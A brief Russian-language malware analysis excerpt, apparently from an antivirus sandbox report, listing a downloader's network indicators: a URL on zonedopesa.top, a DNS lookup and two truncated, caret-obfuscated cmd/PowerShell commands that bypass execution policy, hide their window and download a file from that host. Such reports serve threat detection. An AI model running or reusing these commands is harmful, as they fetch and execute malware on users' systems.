Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^e^r^SHEll.E^XE^ -eXE^c^UtIOnpOli^CY B^yp^a^ss^ -^noP^roFilE -^w^In^DoWs^T^y^Le HID^D^E^n^ (^nEw-oB^JeCT^ sYS^Tem.^net.wEB^cLI^E^Nt^).^dO^W^N^lOAd^fiLe('http://www.zonedopesa.to...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "PoW^e^r^SHEll.E^XE^ -eXE^c^UtIOnpOli^CY B^yp^a^ss^ -^noP^roFilE -^w^In^DoWs^T^y^Le HID^D^E^n^ (^nEw-oB^JeCT^ sYS^Tem.^net.wEB^cLI^E^Nt^).^dO^W^N^lOAd^fiLe('http://www.zonedopesa.to...' (со скрытым окном)